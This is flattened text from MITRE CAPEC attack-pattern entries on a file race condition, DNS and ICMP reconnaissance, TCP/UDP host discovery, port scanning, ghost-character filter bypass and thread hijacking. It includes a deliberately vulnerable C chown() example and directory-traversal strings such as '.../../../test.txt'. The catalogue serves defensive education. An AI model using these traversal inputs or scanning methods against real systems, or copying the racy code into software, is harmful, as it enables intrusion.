Time and State
Modification of Resources
The Net Direct client for Linux before 6.0.5 in Nortel Application Switch 2424, VPN 3050 and 3070, and SSL VPN Module 1000 extracts and executes files with insecure permissions, which allows local users to exploit a race condition to replace a world-writable file in /tmp/NetClient and cause another user to execute arbitrary code when attempting to execute this client, as demonstrated by replacing /tmp/NetClient/client.
CVE-2007-1057
The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an attacker can replace the file referenced by the name.
C
include <sys/types.h>
include <fcntl.h>
include <unistd.h>
define FILE "/tmp/myfile"
define UID 100
void test(char *str)
{
int fd;
fd = creat(FILE, 0644);
if(fd == -1)
return;
chown(FILE, UID, -1); /* BAD */
close(fd);
}
int main(int argc, char **argv)
{
char *userstr;
if(argc > 1) {
userstr = argv[1];
test(userstr);
}
return 0;
}
[R.29.3]
Medium
This attack can get sophisticated since the attack has to occur within a short interval of time.
Vulnerability testing tool can be used to probe for race condition.
The attacker may also look for temporary file creation. The attacker may try to replace them and take advantage of a race condition.
Use safe libraries to access resources such as files.
Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition.
Use synchronization to control the flow of execution.
Use static analysis tools to find race conditions.
Pay attention to concurrency problems related to the access of resources.
Integrity
Modify memory
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Alter execution logic
Confidentiality
Read application data
Availability
DoS: resource consumption (CPU)
Denial of Service
367
Targeted
368
Secondary
366
Secondary
370
Secondary
362
Secondary
662
Targeted
691
Targeted
663
Targeted
665
Secondary
1000
Attack Pattern
ChildOf
26
1000
Category
ChildOf
172
Least Privilege
Exploitation
High
High
Low
All
All
All
All
J. Viega
G. McGraw
Building Secure Software
Addison-Wesley
2002
Common Weakness Enumeration (CWE)
CWE-20 - Input Validation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/20.html
Fortify Software
SAMATE - Software Assurance Metrics And Tool Evaluation
Test Case ID 1598
National Institute of Standards and Technology (NIST)
2006-06-22
http://samate.nist.gov/SRD/view_testcase.php?tID=1598
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker enumerates the MX records for a given via a DNS query. This type of information gathering returns the names of mail servers on the network. Mail servers are often not exposed to the Internet but are located within the DMZ of a network protected by a Firewall. A side effect of this configuration is that enumerating the MX records for an organization my reveal the IP address of the firewall or possibly other internal systems. Attackers often resort to MX record enumeration when a DNS Zone Transfer is not possible.
Application Layer
Server-side
Service
Access to a DNS server that will return the MX records for a network.
Low
A command-line utility or other application capable of sending requests to the DNS server is necessary.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
309
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pp. 38
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits a DNS misconfiguration that permits a ZONE transfer. Some external DNS servers will return a list of IP address and valid hostnames. Under certain conditions, it may even be possible to obtain Zone data about the organization's internal network. When successful the attacker learns valuable information about the topology of the target organization, including information about particular servers, their role within the IT structure, and possibly information about the operating systems running upon the network. This is configuration dependent behavior so it may also be required to search out multiple DNS servers while attempting to find one with ZONE transfers allowed.
Application Layer
Server-side
Service
Access to a DNS server that allows Zone transfers.
Low
A client application capable of interacting with the DNS server or a command-line utility or web application that automates DNS interactions.
Confidentiality
Read application data
1000
Attack Pattern
ChildOf
309
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pp. 34
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends a probe to an IP address to determine if the host is alive. Host discovery is one of the earliest phases of network reconnaissance. An attacker usually starts with a range of IP addresses belonging to a target network and uses various methods to determine if a host is present at that IP address. Host discovery is usually referred to as 'Ping' scanning using a sonar analogy. The goal of the attacker is to send a packet through to the IP address and solicit a response from the host. As such, a 'ping' can be virtually any crafted packet whatsoever, provided the attacker can identify a functional host based on its response. An attack of this nature is usually carried out with a 'ping sweep' where a particular kind of ping is sent to a range of IP addresses.
Network Layer
Transport Layer
Server-side
Network
Host
A network capable of routing the attackers' packets to the destination network.
Low
The resources required will differ based upon the type of host discovery being performed. Usually a scanner or scanning script is required due to the volume of requests that must be generated.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
169
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 1: Footprinting, pp.44
6th Edition
McGraw Hill
2009
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 3.6 Host Discover Techniques, pg.57
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses a traceroute utility to map out the route which data flows through the network in route to a target destination. Tracerouting can allow an attacker to construct a working topology of systems and routers by listing the systems through which data passes through on their way to the targeted machine. This attack can return varied results depending upon the type of traceroute that is performed. Traceroute works by sending packets to a target while incrementing the Time-to-Live field in the packet header. As the packet traverses each hop along its way to the destination, its TTL expires generating an ICMP diagnostic message that identifies where the packet expired. Traditional techniques for tracerouting involved the use of ICMP and UDP. As more firewalls began to filter ingress ICMP, methods of traceroute using TCP were developed
Network Layer
Transport Layer
Server-side
Network
Host
Service
A network capable of routing the attackers' packets to the destination network.
Low
A command line version of traceroute or similar tool that performs route enumeration.
Confidentiality
"Varies by context"
1000
Attack Pattern
ChildOf
309
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pp. 38-41
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends an ICMP Type 17 Address Mask Request to gather information about a target's networking configuration. ICMP Address Mask Requests are defined by RFC-950, "Internet Standard Subnetting Procedure." An Address Mask Request is an ICMP type 17 message that triggers a remote system to respond with a list of its related subnets, as well as its default gateway and broadcast address via an ICMP type 18 Address Mask Reply datagram. Gathering this type of information helps an attacker plan router-based attacks as well as denial-of-service attacks against the broadcast address. Many modern operating systems will not respond to ICMP type 17 messages for security reasons. Determining whether a system or router will respond to an ICMP Address Mask Request helps the attacker determine operating system or firmware version. Additionally, because these types of messages are rare they are easily spotted by intrusion detection systems. Many ICMP scanning tools support IP spoofing to help conceal the origin of the actual request among a storm of similar ICMP messages. It is a common practice for border firewalls and gateways to be configured to block ingress ICMP type 17 and egress ICMP type 18 messages.
Network Layer
Server-side
Network
Host
The ability to send an ICMP type 17 query (Address Mask Request) to a remote target and receive an ICMP type 18 message (ICMP Address Mask Reply) in response. Generally, modern operating systems will ignore ICMP type 17 messages, however, routers will commonly respond to this request.
Low
The ability to send custom ICMP queries. This can be accomplished via the use of various scanners or utilities. The following tools allow a user to craft custom ICMP messages when performing reconnaissance:
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Hide activities
1000
Attack Pattern
ChildOf
292
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pp. 53-54
6th Edition
McGraw Hill
2009
J. Mogul
J. Postel
RFC950 - Internet Standard Subnetting Procedure
August 1985
http://www.faqs.org/rfcs/rfc950.html
J. Postel
RFC792 - Internet Control Messaging Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc792.html
Mark Wolfgang
Host Discovery with Nmap
November 2002
http://nmap.org/docs/discovery.pdf
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 3.7.2 ICMP Probe Selection, pg. 70
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends an ICMP type 13 Timestamp Request to determine the time as recorded by a remote target. Timestamp Replies, ICMP Type 14, usually return a value in Greenwich Mean Time. An attacker can attempt to use an ICMP Timestamp requests to 'ping' a remote system to see if is alive. An attacker may be able to use the timestamp returned from the target to attack time-based security algorithms, such as random number generators, or time-based authentication mechanisms. Additionally, because these types of messages are rare they are easily spotted by intrusion detection systems. Many ICMP scanning tools support IP spoofing to help conceal the origin of the actual request among a storm of similar ICMP messages. It is a common practice for border firewalls and gateways to be configured to block ingress ICMP type 13 and egress ICMP type 14 messages.
Network Layer
Server-side
Network
Host
The ability to send an ICMP type 13 query (Timestamp Request) to a remote target and receive an ICMP type 14 message (Timestamp Reply) in response.
Low
The ability to send custom ICMP queries. This can be accomplished via the use of various scanners or utilities.
Confidentiality
"Varies by context"
1000
Attack Pattern
ChildOf
292
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pp. 44-51
6th Edition
McGraw Hill
2009
J. Postel
RFC792 - Internet Control Messaging Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc792.html
R. Braden, Ed.
RFC1122 - Requirements for Internet Hosts - Communication Layers
October 1989
http://www.faqs.org/rfcs/rfc1122.html
Mark Wolfgang
Host Discovery with Nmap
November 2002
http://nmap.org/docs/discovery.pdf
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 3.7.2 ICMP Probe Selection, pg. 70
3rd "Zero Day" Edition
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends an ICMP Information Request to a host to determine if it will respond to this deprecated mechanism. ICMP Information Requests are a deprecated message type that no has any use. Information Requests were originally used for diskless machines to automatically obtain their network configuration, but this message type has been superseded by more robust protocol implementations like DHCP.
Network Layer
Server-side
Network
Host
The ability to send an ICMP Type 15 Information Request and receive an ICMP Type 16 Information Reply in response.
Low
The ability to send custom ICMP queries. This can be accomplished via the use of various scanners or utilities.
Confidentiality
"Varies by context"
1000
Attack Pattern
ChildOf
292
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pp. 44-51
6th Edition
McGraw Hill
2009
J. Postel
RFC792 - Internet Control Messaging Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc792.html
R. Braden, Ed.
RFC1122 - Requirements for Internet Hosts - Communication Layers
October 1989
http://www.faqs.org/rfcs/rfc1122.html
Mark Wolfgang
Host Discovery with Nmap
November 2002
http://nmap.org/docs/discovery.pdf
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 3.7.2 ICMP Probe Selection, pg. 70
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends a TCP segment with the ACK flag set to a remote host for the purpose of determining if the host is alive. This is one of several TCP 'ping' types. The RFC 793 expected behavior for a service is to respond with a RST 'reset' packet to any unsolicited ACK segment that is not part of an existing connection. So by sending an ACK segment to a port, an attacker identify that the host is alive by looking for a RST packet. Typically a remote server will respond with a RST regardless of whether a port is open or closed. In either case, the attacker can determine that the host is alive. TCP ACK pings cannot discover the state of a remote port because the behavior is the same in either case. TCP ACK pings are most likely to fail in cases where a stateful firewall is present. The firewall will look up the ACK packet in its state-table and discard the segment because it does not correspond to any active connection. A TCP ACK Ping has the following characteristics:
1. Host Discovery: Can be used to discover if a host is alive via RST response packets sent from the host.
2. Effective Against: Stateless Firewalls due to a typical lack of rules that reject unsolicited ACK packets.
3. Weak Against: Stateful Firewalls due to the ability to reject a packet not part of an existing connection.
4. Port State: Unable to determine if a port is open or closed.
The tool nmap will send TCP ACK pings when the command line "-PA" switch is used. Sending an ACK ping requires the ability to access "raw sockets" in order to create the packets with direct access to the packet header.
Transport Layer
Server-side
Host
The ability to send an ACK packet to a remote host and identify the response. Creating the ACK packet without building a full connection requires the use of raw sockets. As a result, it is not possible to send a TCP ACK ping from some systems (Windows XP SP 2) without the use of third-party packet drivers like Winpcap. On other systems (BSD, Linux) administrative privileges are required in order to write to the raw socket.
Low
The ability to craft custom TCP ACK segments for use during network reconnaissance. ACK scanning can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
292
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 49
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 3.6.2 TCP ACK Ping, pg. 61
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
Mark Wolfgang
Host Discovery with Nmap
November 2002
http://nmap.org/docs/discovery.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends a UDP datagram to the remote host to determine if the host is alive. If a UDP datagram is sent to an open UDP port there is very often no response, so a typical strategy for using a UDP ping is to send the datagram to a random high port on the target. The goal is to solicit an ICMP port unreachable message from the target, indicating that the host is alive. UDP pings are useful because some firewalls are not configured to block UDP datagrams sent to strange or typically unused ' ports, like ports in the 65K range. Additionally, while some firewalls may filter incoming ICMP, weaknesses in firewall rule-sets may allow certain types of ICMP (host unreachable, port unreachable) which are useful for UDP ping attempts. A UDP Ping has the following characteristics:
1. Host Discovery: Can be used to discover if a host is alive via ICMP Port Unreachable Messages.
2. Effective Against: Firewalls that allow some incoming UDP which are not configured to block egress ICMP messages.
3. Weak Against: Firewalls properly configured to block UDP datagrams that are also block egress ICMP messages.
4. Port State: Able to determine if a port is closed via ICMP Port Unreachable Messages.
Network Layer
Server-side
Host
The ability to send a UDP datagram to a remote host and receive a response.
Low
The ability to craft custom UDP Packets for use during network reconnaissance. UDP pings can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
292
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 47
6th Edition
McGraw Hill
2009
J. Postel
RFC768 - User Datagram Protocol
August 28, 1980
http://www.faqs.org/rfcs/rfc768.html
Mark Wolfgang
Host Discovery with Nmap
November 2002
http://nmap.org/docs/discovery.pdf
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 3.6.3 TCP UDP Ping, pg. 63
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses a TCP SYN packets as a means of purpose of host discovery. Typical RFC 793 behavior specifies that when a TCP port is open, a host must respond to an incoming SYN "synchronize" packet by completing stage two of the 'three-way handshake' by sending an SYN/ACK in response. When a port is closed, RFC 793 behavior is to respond with a RST "reset" packet. This behavior can be used to 'ping' a target to see if it is alive by sending a TCP SYN packet to a port and then looking for a RST or an ACK packet in response. Due to the different responses from open and closed ports, SYN packets can be used to determine the remote state of the port. A TCP SYN ping is also useful for discovering alive hosts protected by a stateful firewall. In cases where a specific firewall rule does not block access to a port, a SYN packet can pass through the firewall to the host and solicit a response from either an open or closed port. When a stateful firewall is present SYN pings are preferable to ACK pings, because a stateful firewall will typically drop all unsolicited ACK packets because they are not part of an existing or new connection. TCP SYN pings often fail when a stateless ACL or firewall is configured to blanket-filter incoming packets to a port. The firewall device will discard any SYN packets to a blocked port. An attacker will often alternate between SYN and ACK pings to discover if a host is alive. A TCP SYN ping has the following characteristics:
1. Host Discovery: Can be used to discover if a host is alive via ACK or RST packets.
2. Effective Against: Stateful Firewalls that allow incoming new connections to target ports.
3. Weak Against: Stateless firewalls that blanket-filter incoming SYN
4. Port State: Able to determine port state via SYN/ACK or RST response.
Transport Layer
Server-side
Host
The ability to send a TCP SYN packet to a remote target. Depending upon the operating system, the ability to craft SYN packets may require elevated privileges.
Low
The ability to craft custom TCP segments for use during network reconnaissance. SYN pings can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
292
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 48
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 3.6.2 TCP SYN Ping, pg. 61
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
Mark Wolfgang
Host Discovery with Nmap
November 2002
http://nmap.org/docs/discovery.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker intentionally introduces leading characters that enable getting the input past the filters. The API that is being targeted, ignores the leading "ghost" characters, and therefore processes the attackers' input. This occurs when the targeted API will accept input data in several syntactic forms and interpret it in the equivalent semantic way, while the filter does not take into account the full spectrum of the syntactic forms acceptable to the targeted API.
Some APIs will strip certain leading characters from a string of parameters. Perhaps these characters are considered redundant, and for this reason they are removed. Another possibility is the parser logic at the beginning of analysis is specialized in some way that causes some characters to be removed. The attacker can specify multiple types of alternative encodings at the beginning of a string as a set of probes.
One commonly used possibility involves adding ghost characters--extra characters that don't affect the validity of the request at the API layer. If the attacker has access to the API libraries being targeted, certain attack ideas can be tested directly in advance. Once alternative ghost encodings emerge through testing, the attacker can move from lab-based API testing to testing real-world service implementations.
Determine if the source code is available and if so, examine the filter logic.
If the source code is not available, write a small program that loops through various possible inputs to given API call and tries a variety of alternate (but equivalent) encodings of strings with leading ghost characters. Knowledge of frameworks and libraries used and what filters they apply will help to make this search more structured.
Observe the effects. See if the probes are getting past the filters. Identify a string that is semantically equivalent to that which an attacker wants to pass to the targeted API, but syntactically structured in a way as to get past the input filter. That encoding will contain certain ghost characters that will help it get past the filters. These ghost characters will be ignored by the targeted API.
Once the "winning" alternate encoding using (typically leading) ghost characters is identified, an attacker can launch the attacks against the targeted API (e.g. directory traversal attack, arbitrary shell command execution, corruption of files)
The targeted API must ignore the leading ghost characters that are used to get past the filters for the semantics to be the same.
Medium
Medium
Injection
API Abuse
Alternate Encoding with Ghost Characters in FTP and Web Servers
Some web and FTP servers fail to detect prohibited upward directory traversals if the user-supplied pathname contains extra characters such as an extra leading dot. For example, a program that will disallow access to the pathname "../test.txt" may erroneously allow access to that file if the pathname is specified as ".../test.txt". This attack succeeds because 1) the input validation logic fails to detect the triple-dot as a directory traversal attempt (since it isn't dot-dot), 2) some part of the input processing decided to strip off the "extra" dot, leaving the dot-dot behind.
Using the file system API as the target, the following strings are all equivalent to many programs:
.../../../test.txt
............/../../test.txt
..?/../../test.txt
..????????/../../test.txt
../test.txt
As you can see, there are many ways to make a semantically equivalent request. All these strings ultimately result in a request for the file ../test.txt.
Medium
Perform white list rather than black list input validation.
Canonicalize all data prior to validation.
Take an iterative approach to input validation (defense in depth).
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Integrity
Modify application data
Web Form, URL, Network Socket, File
The payload is the parameter that an attacker is supplying to the targeted API that will allow the attacker to elevate privilege and subvert the authorization service.
The targeted API is the activation zone. These attacks often target the file system or the shell to execute commands.
Failure in authorization service may lead to compromises in data confidentiality and integrity.
173
Targeted
41
Targeted
172
Targeted
171
Targeted
179
Targeted
180
Targeted
181
Secondary
183
Secondary
184
Secondary
20
Targeted
74
Targeted
697
Targeted
707
Targeted
1000
Attack Pattern
ChildOf
267
Defense in Depth
Reluctance to Trust
Least Privilege
Perform input validation and filtering on data in its canonical form.
Understand the APIs to which user input will be passed and know how permissive they are. Perform appropriate input validation given that information.
Exploitation
Low
Low
High
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attackers can sometimes hijack a privileged thread from the underlying system through synchronous (calling a privileged function that returns incorrectly) or asynchronous (callbacks, signal handlers, and similar) means.
Having done so, the Attacker may not only likely access functionality the system's designer didn't intend for them, but they may also go undetected or deny other users essential service in a catastrophic (or insidiously subtle) way.
Attacker determines the underlying system thread that is subject to user-control
Attacker then provides input, perhaps by way of environment variables for the process in question, that affect the executing thread
Upon successful hijacking, the attacker enjoys elevated privileges, and can possibly have the hijacked thread do his bidding
The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users
In order to feasibly execute this class of attacks, the attacker must have the ability to hijack a privileged thread.
This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or providing malformed user-controllable input that causes the executing thread to fault and return to a higher privilege level or such.
This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute.
Very High
Low
Analysis
Modification of Resources
API Abuse
Attacker targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread. The Attacker could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations.
High
Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread.
The attacker needs to be able to latch onto a privileged thread. No special hardware or software tool-based resources are required.
The Attacker does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the Attacker's malicious code. This is the case even if the attacker conducts the attack remotely.
The attacker may attach a debugger to the executing process and observe the spawning and cleanup of threads, as well as the switches in privilege levels
The attacker can also observe the environment variables, if any, that affect executing threads and modify them in order to observe their effect on the execution.
Application Architects must be careful to design callback, signal, and similar asynchronous constructs such that they shed excess privilege prior to handing control to user-written (thus untrusted) code.
Application Architects must be careful to design privileged code blocks such that upon return (successful, failed, or unpredicted) that privilege is shed prior to leaving the block/scope.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
270
Secondary
1000
Category
ChildOf
232
Only those constructs within the application that cannot execute without elevated privileges must be granted additional privileges. Often times, the entire function or the entire process is granted privileges that are usually not necessary.
The callee must ensure that additional privileges are shed before returning to the caller. This avoids pinning the responsibility on an inadvertent caller who may not have a clue about the innards of the callee.
Least Privilege
Complete Mediation
Minimize privileged code blocks
Shed any privileges not required to execute at the earliest
Treat the Entire Inherited Process Context as Unvalidated Input
Exploitation
High
High
Low
All
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses a combination of techniques to determine the state of the ports on a remote target. Any service or application available for TCP or UDP networking will have a port open for communications over the network. Although common services have assigned port numbers, services and applications can run on arbitrary ports. Additionally, port scanning is complicated by the potential for any machine to have up to 65535 possible UDP or TCP services. The goal of port scanning is often broader than identifying open ports, but also give the attacker information concerning the firewall configuration. Depending upon the method of scanning that is used, the process can be stealthy or more obtrusive, the latter being more easily detectable due to the volume of packets involved, anomalous packet traits, or system logging. Typical port scanning activity involves sending probes to a range of ports and observing the responses. There are four types of port status that a port scan usually attempts to discover:
1. Open Port: The port is open and a firewall does not block access to the port
2. Closed Port: The port is closed (i.e. no service resides there) and a firewall does not block access to the port
3. Filtered Port: A firewall or ACL rule is blocking access to the port in some manner, although the presence of a listening service on the port cannot be verified
4. Unfiltered Port: A firewall or ACL rule is not blocking access to the port, although the presence of a listening service on the port cannot be verified.
For strategic purposes it is useful for an attacker to distinguish between an open port that is protected by a filter vs. a closed port that is not protected by a filter. Making these fine grained distinctions is impossible with certain scan types. A TCP connect scan, for instance, cannot distinguish a blocked port with an active service from a closed port that is not firewalled. Other scan types can only detect closed ports, while others cannot detect port state at all, only the presence or absence of filters. Collecting this type of information tells the attacker which ports can be attacked directly, which must be attacked with filter evasion techniques like fragmentation, source port scans, and which ports are unprotected (i.e. not firewalled) but aren't hosting a network service. An attacker often combines various techniques in order to gain a more complete picture of the firewall filtering mechanisms in place for a host.
Network Layer
Transport Layer
Server-side
Network
Host
Low
The ability to craft arbitrary packets of various protocol types for use during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
169
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 54
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
J. Postel
RFC768 - User Datagram Protocol
August 28, 1980
http://www.faqs.org/rfcs/rfc768.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 4.1 Introduction to Port Scanning, pg. 73
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses full TCP connection attempts to determine if a port is open. The scanning process involves completing a 'three-way handshake' with a remote port, and reports the port as closed if the full handshake cannot be established. An advantage of TCP connect scanning is that it works against any TCP/IP stack. RFC 793 defines how TCP connections are established and torn down. TCP connect scanning commonly involves establishing a full connection, and then subsequently tearing it down, and therefore involves sending a significant number of packets to each port that is scanned. This type of scanning has the following characteristics. Compared to other types of scans, a TCP Connect scan is slow and methodical. This type of scanning causes considerable noise in system logs and can be spotted by IDS/IPS systems. In terms of port status, TCP Connect scanning can detect when a port is open by completing the three-way handshake, but it cannot distinguish a port that is unfiltered with no service running on it from a port that is filtered by a firewall but contains an active service. Due to the significant volume of packets exchanged per port, TCP connect scanning can become very time consuming. Generally, it is not used as a method for performing a comprehensive port scan, but is reserved for checking a short list of common ports. A TCP Connect scan has the following characteristics:
1. Speed: TCP Connect scanning is very slow.
2. Stealth: TCP SYN scanning is extremely noisy and involves a significant number of packets.
3. Open Port: Detects that a port is open via a successful three-way handshake
4. Filtered Port: Cannot distinguish a closed (unfiltered) port from an open (filtered) port.
5 .Unfiltered Port: Can detect an unfiltered port only when the unfiltered port is in front of an active TCP/IP service.
The TCP Connect scan has the advantage of versatility and ease of use in that it works equally well against all TCP stacks and that it is easy for a novice to interpret the results of the scan due to its all or nothing nature. Its disadvantages are noise, speed, and poor visibility into the filter structure of a firewall. As a general rule, performing a full TCP connect scan against a host can take multiple days.
Transport Layer
Server-side
Host
Service
The TCP connect requires the ability to connect to an available port and complete a 'three-way-handshake' This scanning technique does not require any special privileges in order to perform. This type of scan works against all TCP/IP stack implementations.
Low
The ability to build full TCP connections with a target. This can be achieved via the use of a network mapper or scanner, or via routine socket programming in a scripting language. This can be achieved via the use of a network mapper or scanner, or via socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network to see the response.
Confidentiality
Read application data
1000
Attack Pattern
ChildOf
300
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 54
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 5.3 TCP Connect Scanning, pg. 100
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
